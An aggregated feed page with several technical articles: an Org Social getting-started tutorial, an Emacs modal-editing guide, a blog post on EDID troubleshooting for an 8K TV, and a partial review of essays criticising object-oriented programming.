Quick tutorial to get started on Org Social

Lobsters
en.andros.dev
2025-11-25 09:02:48
Comments...
Original Article

Org Social is a very peculiar decentralized social network, as it works from text files in Org Mode format. Each user interacts through their own social.org file, which they modify with their favorite editor. In this plain text file, you create posts, participate in conversations, leave comments in groups, react, create polls, vote, and much more. All this without depending on a centralized server, without algorithms deciding what you see, without registration, always with total control of your content.

How does it work?

An Org Mode file doesn't have the ability to communicate with other files by itself. To make the magic of Org Social happen, several elements need to work together in perfect harmony:

  • The social.org file: Where you and your posts live.
  • A web hosting service: Where you upload your file so others can read it (for example, GitHub Pages, Cloudflare Pages, etc.) or any web server (Nginx, Apache, etc.). You also have host.org-social.org available.
  • A domain or public URL: The web address where your file is located (for example, https://my-domain.com/social.org). host.org-social.org provides you with a public URL automatically.
  • An Org Social client (org-social.el, for example): Responsible for reading the social.org files of other users you follow and building the timeline with their posts, replies, etc.
  • A relay (optional): A service that indexes public social.org files so clients can easily discover new users and be notified when strangers interact with you. If you use org-social.el, this step is handled automatically; you can ignore it.

Therefore, for someone to read your latest post, the following happens:

flowchart TD
    A[User creates social.org] --> B[Upload social.org to a web hosting service]
    B --> C[The social.org file is available at a public URL]
    C --> D[Another user uses a client org-social.el]
    D --> E[The client downloads social.org from the public URL]
    E --> F[The client displays the posts in the user's timeline]

  1. You add a post to your social.org file using your text editor (Emacs, for example).
  2. You upload the modified file to a web hosting service or sync with host.org-social.org .
  3. Another user, who is following you, opens their client (like org-social.el in Emacs).
  4. The client downloads your social.org file from the public URL where you hosted it, along with the files of all the other users they follow.
  5. The client generates a timeline with all the posts, replies, etc. (similar to X/Twitter, Mastodon, etc.) for the user. Among those posts will be yours.

To read their posts, the process is the same but in reverse.

Just plain text files and public links! The syntax that you write, that the client understands, and that the Relay processes is called Social Org.

Are you ready to get started?

Step 1: Register on a hosting service

You need to put your future social.org on the Internet so others can read it. To do this, you should use a web hosting service (GitHub Pages, Cloudflare Pages, etc.) or your own web server (Nginx, Apache, etc.). However, there's a faster alternative: host.org-social.org , a free service for hosting social.org files that will simplify your first steps and interactions with other users.

Go to https://host.org-social.org/signup and register with an alias you like. Warning! You won't be able to change it once created.

Write down the VFile Token and the Public URL that are provided to you VERY CAREFULLY. You won't be able to recover them if you lose them, and they are essential to keep access to your account.

Step 2: Install and configure org-social.el

Now comes the fun part: installing the Emacs client for Org Social. This client will allow you to read posts from other users and easily create new posts among many other functions.

M-x package-install RET org-social RET
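
If package-install cannot find org-social, your package archives may not include the repository it is distributed from (I'm assuming MELPA here). In that case, add MELPA and refresh the package list first:

(require 'package)
(add-to-list 'package-archives
             '("melpa" . "https://melpa.org/packages/") t)
(package-initialize)
;; then run M-x package-refresh-contents and retry the install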

In your Emacs configuration, add:

(setq org-social-file "YOUR VFILE")
(setq org-social-relay "https://relay.org-social.org/")
(setq org-social-my-public-url "YOUR PUBLIC URL")

And change:

  • YOUR VFILE to the token you were given at host.org-social.org
  • YOUR PUBLIC URL to the public URL you were given at host.org-social.org

Don't modify org-social-relay . Perhaps in the future you can change it if you use another relay, but for now leave it as is.

Now restart Emacs or evaluate those lines so the changes take effect.

Step 3: Create your first post

The time has come to interact with the Org Social network. Let's create your first post.

In Emacs, run:

M-x org-social-timeline

This will open the Org Social interface without much content, since you're not following anyone yet.

Now:

  1. Press n (for "new post") or click the "New Post" button in the top bar. A new Org buffer will open so you can write your post.
  2. Write your message, for example: "Hello Org Social!"
  3. Save the buffer with Ctrl + x and then Ctrl + s

Take the opportunity to configure your profile. Edit these lines at the beginning of the social.org file with your data:

#+TITLE: My journal on Org Social
#+NICK: YourNickWithoutSpaces
#+DESCRIPTION: I'm new to Org Social. I like [your interests here]

Save again: Ctrl + x and then Ctrl + s .

You now have your first post created! The client will automatically upload your social.org file to host.org-social.org, register you on the network (Relay), and other users will be able to read you. Try opening your public URL in a web browser to see your social.org file.
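
For reference, this is roughly the structure the client writes into social.org for each post (an illustrative sketch based on the Org Social format; the exact properties and layout are generated for you, so you normally only type the message text):

* Posts
**
:PROPERTIES:
:ID: 2025-11-25T10:00:00+0100
:END:

Hello Org Social!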

Step 4: Follow other users

Now that you have your profile working, it's time to discover other users.

Click on "Discover" in the top bar to see a list of users. You can follow any of them by clicking the "Follow" button next to their name or by adding their URL in the header of your social.org file with the following syntax:

#+TITLE: Bob's journal
#+NICK: Bob
#+FOLLOW: https://alice.com/social.org
#+FOLLOW: myBestFriend https://jane.com/social.org

You can open your file at any time with org-social-open-file .

Next steps

Now that you have the basics, you can explore:

  • Create polls
  • Join groups
  • Use mentions to tag other users
  • Post with rich formatting (tables, code, images)
  • Have a personal blog (with its own RSS feed)

The important thing is that you keep experimenting and having fun with Org Social. Welcome to the community!

emacs for code editing

Lobsters
redpenguin101.github.io
2025-11-25 07:58:27
Comments...
Original Article

Editing Code in Emacs

When you write code, you want to focus on the code, not on the text of the code. This means a) you have to have a good text editing setup, and b) you need to have a muscle-memory level instinct for using that setup. The second comes with practice and with consistency (i.e. not changing your config too much too quickly). The first is what I will talk about here.

This document is meant for people who are current users of, or at least slightly familiar with Emacs. I won’t spend much time explaining Emacs basics - for example how incremental search, or compilation buffers work (I would recommend Mastering Emacs for that). But I will give rationales for the choices I’ve made in encouraging or discouraging certain patterns.

You can read this in two ways: The general Emacs commands I use to try to edit the text of programs efficiently, and the specific keybinds I use in my modal ‘command’ mode to make those commands as convenient as possible.

No Mouse, No Arrows

All text editing practices rely on minimising the work your fingers do by minimising the number of keystrokes and keeping your fingers as close to the home row as possible. This means no arrow keys and no mouse. This can be enforced by remapping your arrow keys to ignore , and by installing the package disable-mouse .
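
If you want to wire this up yourself, a minimal sketch (assuming the global-disable-mouse-mode command provided by the disable-mouse package) could look like this:

;; Send the arrow keys to `ignore' so they do nothing.
(dolist (key '("<up>" "<down>" "<left>" "<right>"))
  (global-set-key (kbd key) #'ignore))

;; Provided by the third-party disable-mouse package.
(global-disable-mouse-mode 1)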

Editing code is different from writing prose in that you spend a lot more time moving around the document, and moving things around in the document, than actually writing text. The actions for moving are more important than the actions for typing, and should therefore be closer to hand. This is the premise of modal editing : the “default” actions of most keyboard keys are to move, not to type. For example in the default ‘mode’, hitting ‘a’ doesn’t type the ‘a’ character, it moves the cursor to the start of the line. To actually type things, you need to hit a special key which puts you in ‘insert’ mode. Then when you are finished typing, you hit another key which puts you in the default (or ‘command’) mode.

My modal system is custom written and very lightweight - about 150 lines, not including the keybinds themselves. I recommend using a modal system, if not mine then someone else’s, such as Evil or Meow. But if you really dislike them, you can still do everything I describe here in vanilla emacs, and most of the commands already have default keybinds. There are only four ‘custom’ functions I use: the half page scrolls, and the kill-whole-word/sexp. And all are very simple.
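
For illustration, here is the sort of thing those custom functions could look like; this is a rough sketch of my own, not the author's code:

(require 'thingatpt)

(defun my/scroll-half-page-forward ()
  "Move down half a window, keeping the cursor line centred."
  (interactive)
  (forward-line (/ (window-body-height) 2))
  (recenter))

(defun my/scroll-half-page-backward ()
  "Move up half a window, keeping the cursor line centred."
  (interactive)
  (forward-line (- (/ (window-body-height) 2)))
  (recenter))

(defun my/kill-whole-word ()
  "Kill the word the cursor is currently in."
  (interactive)
  (let ((bounds (bounds-of-thing-at-point 'word)))
    (when bounds (kill-region (car bounds) (cdr bounds)))))

(defun my/kill-whole-sexp ()
  "Kill the sexp the cursor is currently in."
  (interactive)
  (let ((bounds (bounds-of-thing-at-point 'sexp)))
    (when bounds (kill-region (car bounds) (cdr bounds)))))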

A note on defaults

A problem with customised setups is that they mean you can’t pick up your friend’s Emacs setup and use it, because your muscle memory will cause you to hit all the wrong keys. This effect can be mitigated by sticking with the ‘language’ of the system. Emacs has pretty clear (if arguably not very good) conventions for most of its keys: f means forward, n means next, C-g is always ‘cancel’. My setup tries to stick with these conventions as much as possible. f in command mode is ‘forward-word’. n is ‘next line’.

Additionally there is basically no remapping for insert mode . The idea being that editing in a vanilla Emacs is the same as editing using only insert mode in my setup. I find that you spend a fair amount of time navigating from within insert mode even in my setup, so you won’t lose your muscle memory.

Leaders

The most common actions for moving around the screen are on a single keystroke in command mode. For example, to go to the next line, you hit n . To go forward by a word, press f .

Less common, but still important commands are usually two or three keystrokes. For example, save file is vs . Kill word is kf . In these cases, the first key is a ‘leader’ key. I use a few leader keys:

  • v : A general leader key, but mostly for file, buffer and window operations.
  • k : Kill leader: most of the kill commands are under this.
  • s : Search leader: most searches are under this
  • vp : Project leader: contains several operations that are useful when working on a ‘project’ that consists of many files, which is very common with programming projects.

Getting in and out of insert mode

To transition from command to insert mode, press i . To transition from insert to command mode, press C-j .

There are a few more ways to get into insert mode:

  • I : Insert after character
  • O : Insert in overwrite mode (overwrite mode will be cancelled when you return to command mode)
  • A : Insert at start of (indented) line
  • E : Insert at end of line
  • C-RET : Newline and insert
  • S-RET : Newline above and insert

Moving Vertically

I recommend you set up relative line numbers, and global-hl-line-mode so you can clearly see which line your cursor is on and how far away each line is.

(setq-default display-line-numbers-type 'relative)
(global-display-line-numbers-mode 1)
(global-hl-line-mode +1)

In command mode press n to move to the next line, and p to move to the previous line. Often they will be used in conjunction with a numeric prefix: type 12n to move down 12 lines. This number-prefix pattern is general: you can do most commands multiple times by typing digits before typing the command.

r moves up by a half page, and t moves down by a half page while keeping the cursor line in the middle of the screen. These are used in preference to the usual scroll-up and scroll-down commands, which move so much you have to spend a second reorienting.

Two useful and related actions are recenter-top-bottom and move-to-window-line-top-bottom . These are bound to l and L respectively. l moves the screen around the current highlighted line - first centring the screen around the hl-line, then putting the hl-line at the top of the screen, then at the bottom. It’s best to just try it out. L is sort of the opposite, it moves the cursor around the screen, first to the center, then to the top, then to the bottom.

. and , are ‘beginning-of-defun’ and ‘end-of-defun’. You can think of these as moving by a top level ‘block’. These are usually pretty useful, but depend on your language mode having a good definition for what a ‘block’ is.

Less often used, but occasionally useful, are < and > for moving to the beginning and end of the current buffer.

Moving Horizontally

Moving horizontally is important, but when programming you should really avoid using these commands too much in favour of moving in larger syntactic units - see the later sections on moving by expression and search.

You should turn on subword mode:

(global-subword-mode 1)

When moving horizontally, try to move in as large a unit as you can. You should almost never move left or right by an individual character. The smallest general unit is a “word” - similar to how most editors will use Ctrl-Right to move right by a word. To move forward by a word, press f . To move backward by a word, press b .

The definition of a ‘word’ in Emacs can be a bit tricky, especially when it comes to programming. foo_bar_baz is three words. fooBarBaz (if you’ve got subword mode turned on) is also three words. So for either of these, if your cursor is on the f of foo , pressing f to go forward will put you before the bar symbol. This is handy for changing things within a long variable name. But it’s not great for rapid navigation. Which is why I recommend moving by expression over moving by word .

If you must move by a single character, use C-f and C-b respectively.

e moves to the end of the current line. a moves to the start of the current line, but generally you should prefer m , which moves to the first non-whitespace character of the line - which is usually what you want when programming. However, if I’m trying to move to the start or end of a line, it’s usually because I want to type something there. And for doing that you can use A and E respectively, which will move to the start or end of the line and immediately enter insert mode.

This is it for moving strictly within a line. But for the various reasons outlined above, you really shouldn’t use these too much. There are better ways to move within a line: moving by expression and moving by search.

Moving by Expression

S-Expressions, or Sexps, are a big thing in lisps and therefore in Emacs. Most programming languages are syntactically ‘blocks’ of symbols enclosed in different bracket types. Many use curly braces to denote execution blocks - function bodies, loops, structure definitions - square brackets to denote arrays, and parentheses to denote parameter/argument lists. All fit the s-expression definition. When you’re moving around a program it can be useful to think in terms of jumping in to, out of, over, or within those blocks. Emacs has lots of commands for this, and there are extensions which add even more, but I really only use four.

j moves forward by a sexp. If the cursor is over an opening bracket of any kind, pressing j will jump over that whole block. h will do the same thing, but backwards. This can effectively be used as a ‘jump to matching bracket’ command.

If on a non-bracket character, these will jump forward or back by one syntactic symbol. This should generally be preferred to moving by word because in most cases when programming you want to jump over the symbol, not the word. For example if you are at the start of the variable name foo_bar_baz , unless you want to change something in that variable, you probably want to jump over the whole thing. j will do that, whereas f will jump you to bar .

The other two I use are ‘down-list’ ( d ) and up list ( u ). These jump into and out of a block. For example if my editor looks like this, where | is the cursor position: dele|te(state.im_temp_entity_buffer) , and I hit d , the cursor will be moved into the next block - in this case the argument list for delete: delete(|state.im_temp_entity_buffer) . Pressing u will move the cursor out of that list: delete(state.im_temp_entity_buffer)| . This works on any type of brackets. These can also be used with a negative argument (e.g. -d ) to go back into and back out of an expression. You can reverse the above sequence with -d , resulting in delete(state.im_temp_entity_buffer|) , and then -u resulting in delete|(state.im_temp_entity_buffer) .

Using these sexp expressions when programming is usually far more effective than using the horizontal movements like ‘forward-word’, and you should get into the habit of preferring them.

Moving by Search

Sexps are great, but really the best way to move more than a few words around your buffer is to move by searching for the string of text you want to jump to. If the location you want to jump to is on the screen, this creates a sort of ‘look at, jump to’ dynamic, where you find where you want your cursor to be with your eyes, type some of the text at that location, and your cursor is now there. But it also works great if the location you’re looking for is off the screen.

The simplest commands are the usual ‘isearch-forward’ and ‘isearch-backward’. The mappings for these are unchanged from standard Emacs: C-s and C-r . There are packages which provide alternative versions of this - ‘jump-char’ and ‘avy’, for example - but I find these work fine.

Sometimes you’re searching for something that is pretty common, and using incremental search is a slog. In this case, you can use occur, with so , which creates a buffer with all the instances of the search term, hyperlinked so you can easily jump to that location.

How to use occur is not specific to my setup, but it is very useful to learn, so I’ll go into some detail. When you are in an occur buffer:

  • M-n and M-p will move up and down, but won’t jump the original buffer to the relevant line
  • n and p will do the same, but it will update the original buffer to show the line
  • M-g M-n and M-g M-p will not only update the original buffer to show the selected line, but it will make the original buffer active at that location. A bit hard to explain in words, but it’s very useful, try it out.

The other useful thing about occur is that, while it’s read only by default, you can make it editable with e . And from here you can edit the original buffers from within the occur window. Huge. Get back to read-only mode with C-c C-c .

You can also create an occur window for multiple buffers with multi-occur-in-matching-buffers . But I find that a bit fiddly. What I would really like is a ‘project-occur’ which searches for all instances of a term in the current project. But Emacs doesn’t have that built in as far as I’m aware, though I believe it’s in the common ‘projectile’ external package. I use the ‘ag’ package and the Silver Searcher search program to search project-wide for terms, but it’s not ideal.

Registers and the Mark

Another way to quickly jump around a buffer is to use registers. These are short lived ‘bookmarks’, which you can set and return to. Typically I’ll use these when I want to temporarily jump to another location from a point I’ll want to return to afterwards. For example, jumping into a function from the calling location, then back out to the calling location. Typically I’ll hit v SPC a to set my current location to the register a . Then jump to the other place. Then when I’m done, vja will take me back to my original location. If I want to chain these together, I’ll use the registers a , s , d and f as a sort of ‘stack’. Often I’ll also want to jump between two locations repeatedly, so I’ll set them up as a and s .

An alternative way to get the above behaviour is to use the ‘mark’ as a very transitory, but automatic, register. When you do most ‘jumps’ in emacs, e.g. using isearch, a temporary register called the ‘mark’ is created in the place you jumped from. Or, you can set it manually using gg . Then, you can jump to that mark (resetting it to the place you jumped from in the process) with C-x C-x . This is like the a and s pattern I described above, but with the advantage that you don’t have to set the register yourself. You can also ‘pop’ the mark by hitting C-u g . And you can do this repeatedly by hitting C-u g g g . The downside being that the mark is less permanent than the registers, so you can accidentally set it to something else, and you’ll find your jumps will take you somewhere you don’t expect, which is disorienting. For that reason I usually use manual registers.
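
For reference, the workflow above maps onto standard Emacs commands; the vanilla bindings (before any custom keymap) are:

;; point-to-register          C-x r SPC <reg>   store point in a register
;; jump-to-register           C-x r j <reg>     jump back to it
;; exchange-point-and-mark    C-x C-x           jump to the mark (and back)
;; set-mark-command           C-u C-SPC         pop back through the mark ring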

Find and replace

While you can use occur mode to do find-replace, generally it’s easier to use sq (query-replace). This is both standard emacs functionality and works basically the same as other editors’ find-replace, so I won’t go into how it works.

A variant on that is vpq , which is project query-replace. It works the same way, but runs through every file in your project, not just the current buffer.

Killing, or Cut Copy Paste

In the hierarchy of importance of operations in program text editing, moving around the buffer is top, cut/copy/paste is second, and typing is third.

We’ve seen that there are lots of options for moving around the screen using different syntactic units. Moving and ‘killing’ (as emacs calls the operation that is usually called cut) are sort of ‘twinned’: for each move, there is usually an equivalent kill. And in my setup they are, where possible, on the same keys, just with a k prefix.

So kf is kill forward word, kj is kill forward sexp. A full list is below, but if you just think about how you move by a certain amount, you can usually get the equivalent kill function this way.

There are a few special cases for kills though. There is kf for kill forward word and kj for kill forward sexp, but often what you want to do is kill the whole word/sexp you are currently in . These are the ki (kill whole word) and kn (kill whole sexp) commands. Similarly, ke will kill from your point to the end of the line, but more often you will want to ‘kill whole line’ with kl .

A convenient (though often inefficient) thing to do is kill all the text in a highlighted region. You can do this with kw kill region. Or you can copy a region with ks kill ring save.

You will often find yourself wanting to kill from your cursor up to a certain character. Emacs calls this a ‘zap’, and you can do it with kz zap to character.

Finally, if you find yourself wanting to join the current line with the line above it, k6 will do that.

To paste, just hit y (for yank).

Here is the full list of kill commands.

  • kf kill word
  • kb kill back
  • kj kill sexp
  • kn kill inner sexp
  • kh kill sexp back
  • ke kill to end of line
  • kl kill whole line
  • kw kill region
  • ks kill ring save
  • k6 join line
  • kr kill rectangle
  • kz zap to character
  • ki kill inner word

File and window operations

When programming you spend a lot of time jumping between files and buffers within the ‘project’. The project usually being defined as the root of the source repo.

Most of these operations are mapped with the v leader key, and in the case of commands that operate on the whole project, vp . None of them are particularly unusual, so I’ll just list them:

Window commands

  • w delete other windows
  • o other window
  • v1 delete other window
  • v2 split window below
  • v3 split window right

File commands

  • vf find file
  • vpf project find file
  • vs save file
  • vps save project files
  • vr recent files (requires some custom setup)
  • vd dired
  • vpd project root dired

Buffer commands

  • vk kill buffer
  • vpk project kill buffers
  • vb switch buffer
  • vpb project switch to buffer

Other useful things that don’t fit anywhere else

Macros are surprisingly usable in Emacs, though they are something of an art. v[ starts defining a macro, v] ends it. vm applies the macro. You can apply it repeatedly with vmmmmm...

LSPs using Emacs LSP implementation eglot are something of a mixed blessing in my experience. I usually keep it turned off. But sometimes being able to use ‘xref-find-definition’ ( M-. ) and the improved tab completion is too useful to ignore.

‘comment-line’ ; I use all the time. If you have a region highlighted, it will comment out the region.

/ for ‘undo’, v\ for whitespace cleanup. q for ‘fill or reindent’ will usually tidy the formatting of whichever block you’re in. x is ‘execute command’. z is repeat.

Rectangle editing is often useful. Highlight the region you want to edit, and then kr to kill it, or vt to replace the rectangle with the thing you type. I find this works for most cases I would use multi-cursor in other editors.

vv opens the VC interface (magit, in my case).

I tend to use sh to highlight a phrase in a certain colour when I want something I’m currently working on to show up clearly.

vi for imenu, and vI for imenu-to-buffer are reasonable ways to browse your code by ‘section’, provided the major-mode implements it properly.

I disable a bunch of commands I sometimes hit accidentally with unpleasant consequences, most annoyingly the two ‘suspend’ shortcuts C-z and C-x C-z .
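
Unbinding them is a one-liner each; for example:

;; Stop C-z and C-x C-z from suspending/minimising the frame.
(global-unset-key (kbd "C-z"))
(global-unset-key (kbd "C-x C-z"))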

Non-editing Configuration

I have some other stuff in my configuration apart from the above keybindings. But most of it is either very common (fixing where temporary files are saved), or very specific to how I like to do things and not good general advice. For example I turn off transient mark mode, but I wouldn’t recommend it generally.

Tab completion can be a pain to get how you like it. I use this, but it’s not perfect:

(setq-default indent-tabs-mode t)
(setq-default tab-width 4)
(setq tab-always-indent 'complete)
(setq tab-first-completion 'word)

I would recommend relying on as few external packages as possible. I use, and would recommend, these ones:

  • ag : an interface to the Silver Searcher search program. This is a way to search for a term across a whole project. grep is a reasonable alternative, but I prefer the Silver Searcher. Use it with sa
  • diff-hl : A utility for highlighting lines that have changed since your last commit.
  • magit : makes using git bearable (or possible, for things like rebasing)
  • visible-mark : indicate visually where the ‘mark’ is.

And a couple of other, language specific ones.

Why not vim?

No reason other than I’m used to emacs. There’s nothing here you couldn’t equally do with vim.

My init.el

Is here: https://github.com/RedPenguin101/dotfiles/blob/main/init.el

Russell Coker: EDID and my 8K TV

PlanetDebian
etbe.coker.com.au
2025-11-25 07:09:41
I previously blogged about buying a refurbished Hisense 65u80g 8K TV with the aim of making it a large monitor [1] and about searching for a suitable video card for 8k [2]. After writing the second post I bought an Intel Arc B580 which also did a maximum of 4096*2160 resolution. This post covers man...
Original Article

I previously blogged about buying a refurbished Hisense 65u80g 8K TV with the aim of making it a large monitor [1] and about searching for a suitable video card for 8k [2] . After writing the second post I bought an Intel Arc B580 which also did a maximum of 4096*2160 resolution.

This post covers many attempts to try and get the TV to work correctly and it doesn’t have good answers. The best answer might be to not buy Hisense devices but I still lack data.

Attempts to Force 8K

I posted on Lemmy again about this [3] and got a single response, which is OK as it was a good response. They didn’t give me the answer on a silver platter but pointed me in the right direction of EDID [4] .

I installed the Debian packages read-edid , wxedid , and edid-decode .

The command “ get-edid > out.edid ” saves the binary form of the edid to a file. The command “ wxedid out.edid ” allows graphical analysis of the EDID data. The command “ edid-decode out.edid ” dumps a plain text representation of the output, the command “ edid-decode out.edid|grep VIC|cut -d: -f2|sort -n ” shows an ordered list of video modes, in my case the highest resolution is 4096×2160 which is the highest that Linux had allowed me to set with two different video cards and a selection of different cables (both HDMI and DisplayPort).

xrandr --newmode 7680x4320 1042.63  7680 7984 7760 7824  4320 4353 4323 4328
xrandr --addmode HDMI-3 7680x4320
xrandr --output HDMI-3 --mode 7680x4320

I ran the above commands and got the below error:

xrandr: Configure crtc 0 failed

At this time I don’t know how much of this is due to the video card and how much is due to the TV. The parameters for xrandr came from an LLM because I couldn’t find any Google results on what 8K parameters to use. As an aside, if you have a working 8K TV or monitor connected to a computer please publish the EDID data, xrandr output, and everything else you can think of.

I found a Github repository for EDID data [5] but that didn’t have an entry for my TV and didn’t appear to have any other entry for an 8K device I could use.

Resolution for Web Browsing

I installed a browser on the TV; Chrome and Firefox aren’t available for a TV and the Play Store program tells you that (but without providing a reason) when you search for them. I tried the site CodeShack What is my Screen Resolution [6] which said that my laptop is 2460*1353 while the laptop display is actually 2560*1440. So apparently I have 100 pixels used for the KDE panel at the left of the screen and 87 pixels used by the Chrome tabs and URL bar – which seems about right. My Note 9 phone reports 384*661 out of its 2960*1440 display so it seems that Chrome on my phone is running web sites at 4/15 of the native resolution and about 16% of the height of the screen is used by the system notification bar, the back/home/tasklist buttons (I choose buttons instead of swipe for navigation in system settings), and the URL bar when I have “Screen zoom” in system settings at 1/4. When I changed “Screen zoom” to 0/4 the claimed resolution changed to 411*717 (2/7 of the native resolution). Font size changes didn’t change the claimed resolution. The claimed “Browser Viewport Size” by CodeShack is 1280*720 which is 1/6 of the real horizontal resolution and slightly more than 1/6 of the vertical resolution. It claims that the Pixel Density is 2* and a screen resolution of 970*540 which seems to imply that the browser is only working at 1920*1080 resolution!

Netflix

When I view Netflix shows using the Netflix app running on the TV it reports “4K”, which doesn’t happen on Linux PCs (as they restrict 4K content to platforms with DRM), and in the “Device” setting it reports “Device Model” as “Hisense_SmartTV 8K FFM”, so the Netflix app knows all about 4K content and knows the text string “8K”.

YouTube

When I view a YouTube video that’s described as being 8K I don’t get a request for paying for YouTube Premium which is apparently what happens nowadays when you try to play actual 8K video. I turn on “Stats for Nerds” and one line has “Viewport / Frames 1920×1080*2.00” and another has “Current / Optimal Res 3840×2160@60 / 3840×2160@60” so it seems that the YouTube app is seeing the screen as 4K but choosing to only display FullHD even when I have Quality set to “2160p60 HDR”. It declares the network speed to be over 100mbit most of the time and the lowest it gets is 60mbit while 50mbit is allegedly what’s required for 8K.

I installed a few Android apps to report hardware capabilities and they reported the screen resolution to be 1920*1080.

Have I Been Ripped Off?

It looks like I might have been ripped off by this. I can’t get any app other than Netflix to display 4K content. My PC will only connect to it at 4K. Android apps (including YouTube) regard it as 1920*1080.

The “AI Upscaling” isn’t really that great and in most ways it seems at best equivalent to a 4K TV and less than a 4K TV that runs Android apps with an actual 4K display buffer.

Next Steps

The next things I plan to do are to continue attempts to get the TV to do what it’s claimed to be capable of, either an Android app that can display 8K content or a HDMI input of 8K content will do. Running a VNC client on the TV would be an acceptable way of getting an 8K display from a Linux PC.

I need to get a somewhat portable device that can give 8K signal output. Maybe a mini PC with a powerful GPU or maybe one of those ARM boards that’s designed to drive an 8K sign. Then I can hunt for stores that have 8K TVs on display.

It would be nice if someone made a USB device that does 8K video output – NOT a USB-C DisplayPort alternative mode that uses the video hardware on the laptop. Then I could take a laptop to any place that has an 8K display to show and connect my laptop to it.

The one thing I haven’t done yet is testing 8K MP4 files on a USB stick. That’s mainly due to a lack of content and the fact that none of the phone cameras I have access to can do 8K video. I will try displaying 8K PNG and JPEG files from a USB stick.

Most people would give up about now. But I am determined to solve this and buying another large TV isn’t out of the question.

Case against OOP is understated, not overstated (2020)

Lobsters
boxbase.org
2025-11-25 06:56:01
Comments...
Original Article

Here's something for nobody. We've been past this a long while ago now. OOP is one of those substances that stick to the wall if you throw it. Writing about it is almost always pointless because people who should learn refuse to learn, and everybody else has learnt their lesson.

I review and criticize "The Case Against OOP is Wildly Overstated" by Matthew MacDonald. The article itself references a few other posts and I give the same treatment to those. You may have seen these before:

  1. Object-Oriented Programming --- The Trillion Dollar Disaster by Ilya Suzdalnitski
  2. Goodbye, Object Oriented Programming by Charles Scalfani
  3. Why OOP is bad by Konrad Musial
  4. OOP is dead by Karsten Wagner

I go through the main points of these posts so that you don't need to read them. Additionally we'll have :

  • A peek into Grady Booch's book from which "4 pillars of OOP" is claimed to originate from.
  • How the whole OOP is a lauded proglang hack to a record datatype .
  • Predictable alternative for polymorphism (parametric polymorphism).
  • Why pattern matching doesn't do dynamic dispatch but is instead a substitute for inheritance.
  • Misconceptions you might have about types.
  • Why "no" for multiple dispatch.
  • How "dog extends animal" is not evil because you got isomorphisms.
  • Logic programming hidden in sight at Haskell programming language.
  • Concluding with a mathematical explanation why OOP sucks big time.

Not every weekend you get to see such a jewel in the sewer that's the Internet. Let's peek in!

Micro-summaries/reviews of OOP posts

On each post I'll go through the main points they had to say. Ilya's post was largest of them all with 27min read, the second largest was Karsten's post.

I've got my opinions inserted in and the things I pick up form the basis for subjects that the rest of this post covers.

The trillion dollar disaster

Ilya Suzdalnitski makes a lot of claims but doesn't bother to present evidence. He makes up for that by making a lot and lot of claims. There are plenty of references to popular anti-OOP stuff so it's not a total loss. Also it's a structured post that's easy to skim unlike the others in this bunch.

The high point in this post is Edsger W. Dijkstra's quote "Object oriented programs are offered as alternatives to correct ones..." I chuckled at that one, yeah Dijkstra obsessed over correctness and I guess I've ended up to doing that as well.

All the claims:

  1. There's no evidence that OOP is better than plain procedural programming.
  2. Programming paradigms should constrain bad programmers from doing too much damage.
  3. Object oriented programming was supposed to be about messages and actors, rather than about objects and methods.
  4. OOP fails to keep complexity under control because of shared mutable state, erroneous abstractions and low signal-to-noise ratio.
  5. Shared mutable state is hard to track and causes concurrency issues.
  6. Encapsulation is a trojan horse hiding mutable state.
  7. OOP tries to model the real world as objects and class trees through inheritance.
  8. OOP is difficult to unit test.
  9. Forms heavy dependencies between classes unless you create interfaces everywhere and then mock them.
  10. Difficult to refactor without tools.
  11. Mentions design patterns, SOLID, dependency injection as band-aids to OOP.
  12. Mentions abstraction, inheritance, encapsulation, polymorphism as four pillars of OOP with intent to refute these .
  13. OOP is popular due to Java.
  14. It's time to move on.
  15. You're already a functional programmer and learning functional programming makes you better.
  16. Usual defensive arguments are weak and probably never met a true functional language.
  17. Talks about Law of Demeter as useless under-the-rug-sweep.
  18. People try to discredit anything that claim OOP sucks.

Notable references:

  1. Mentions functional programming and Linus Torvalds hating on C++ programming.
  2. Alan Kay's famous quote and refers to Erlang as a "pure form" implementation of OOP.
  3. Stevey Yegge's blogpost "Execution in the Kingdom of Nouns". I prefer the PDF version of Yegge's post . It's criticizing Java programming language for sticking to OOP. I somehow remembered you could find it from the old WikiWikiWeb but I didn't find it there. Just thought it might be fun to remember that site.
  4. Reference to problem factory. I'm sure this is a reference. I just don't know this one. Help welcome! Remind me where the problem factory -term originated from? Yes, there's a design pattern called 'factory', I don't ask about that.
  5. Reference to Joe Armstrong's "Banana, Gorilla, Jungle" -quote.
  6. Transition from horses to automobiles used as argumentation device.

First of all, Alan Kay's remark about classes and objects cannot be used against OOP. Classes and objects were featured in Simula programming language and it went along from there. That it was inspired by something potentially better doesn't demerit it. OOP is a datatype customization feature with an overinflated ego. It exposes decades old implementation details and makes them a principal model where you do programming.

The conception that you discard shared mutable state when you stop doing OOP is the thing that keeps people in. You can do "immutable" OOP and it's not any better!

Taxonomies and attempts to understand the world through them aren't OOP's problem. Besides when you pick this up they point out that you're not supposed to write classes such as a "Car" or a "Banana" and they're just as wrong as Ilya is wrong claiming the opposite.

OOP was verbose from the beginning and it didn't prevent it from going. You're supposed to buy stuff with that verbosity so bickering about "low-signal-to-noise" ratio receives eye rolls only.

They're going to tell you that they're using tools for refactoring and just declare interfaces everywhere so that it can be unit tested. IDE refactors the boilerplate code so they don't worry about it. Interfaces and mocks just everywhere and it is not a problem.

On claims of unit testing and OOP , I'm not going to go there much more because I still don't unit test my stuff. I'm currently not against it. I just don't know about it much. I find it much easier to formally verify things correct than to test that they're correct.

OOP precedes Java. C++ was raging hot popular object oriented language before Java became popular.

Goodbye, Object Oriented Programming

Charles Scalfani was "gung-ho to leverage the benefits of Inheritance, Encapsulation and Polymorphism". He was disappointed that the planes didn't land in his backyard.

  1. Half the post is about the banana-monkey-jungle problem.
  2. Other half is about the fragile base class and contain-and-delegate as a solution to it.
  3. Categorical hierarchies (taxonomies) don't work for programming?
  4. Encapsulation doesn't work because it hides stateful variables.
  5. You don't need object oriented programming for polymorphism. Presents interface-based polymorphism as an alternative.
  6. Shills Elm. Lol. (Scalfani's post is from 2016)

These guys attack the pillars of OOP a lot. This is why I did look into Grady Booch's book.

I guess it'll be also time to talk about these taxonomies and maps. Is this going to be the programmer equivalent of bees and flowers talk?

The fragile base class -problem seems to be well-covered and settled and has not affected the remaining discussion, so I didn't cover that one here. What it's about: Seemingly safe modifications to a base class may cause the derived classes to malfunction. The programmer cannot determine whether a base class modification is safe simply by examining the base class in isolation.

He mentions interface-based polymorphism as an alternative but doesn't say what it is or link to anything!

